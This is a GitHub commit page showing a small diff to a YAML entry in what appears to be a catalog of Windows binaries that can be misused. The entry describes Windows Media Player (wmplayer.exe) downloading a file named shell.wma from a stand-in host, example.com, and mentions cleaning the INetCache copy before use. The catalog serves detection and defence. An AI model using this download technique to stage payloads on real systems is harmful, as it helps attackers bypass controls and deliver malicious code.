Skip to content

Commit

Permalink
Newline & altered command
Browse files Browse the repository at this point in the history
  • Loading branch information
pampuna committed Dec 14, 2024
1 parent f8e6e47 commit c9a0f0e
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions yml/OSBinaries/Wmplayer.yml
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@ Description: Windows Media Player
Author: 'Rutger Flohil'
Created: 2024-12-14
Commands:
- Command: & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "http://example.com/shell.wma"
- Command: wmplayer.exe "http://example.com/shell.wma"
Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.
Usecase: Download file from the internet
Category: Download
Expand All @@ -23,4 +23,4 @@ Detection:
Resources:
- Link: https://pampuna.nl/blog/2024/12/wmplayer.html
- Person: Rutger Flohil
Handle: ''
Handle: ''

0 comments on commit c9a0f0e

Please sign in to comment.